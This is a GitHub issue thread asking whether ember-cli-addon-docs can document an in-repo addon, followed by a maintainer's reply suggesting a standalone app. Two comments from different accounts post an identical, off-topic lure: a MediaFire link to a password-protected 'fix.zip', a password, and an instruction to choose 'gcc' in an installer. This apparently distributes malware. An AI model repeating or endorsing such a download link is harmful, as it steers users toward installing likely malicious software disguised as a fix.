### ISSUE TITLE
Is it possible to use this library for --in-repo-addon?

### ISSUE THREAD

**Issue by mikeelemuel** [ember-learn/ember-cli-addon-docs#1594]
Is it possible to use this library for the -in-repo-addon and host the documentation within the host application? if so, is there a precedent to it?

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rphmauriciodev** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobbieTheWagner** [comment]
@mikeelemuel to be honest, I am not sure. You can always create a standalone app and point it at the folder of your addon https://ember-learn.github.io/ember-cli-addon-docs/docs/standalone-apps
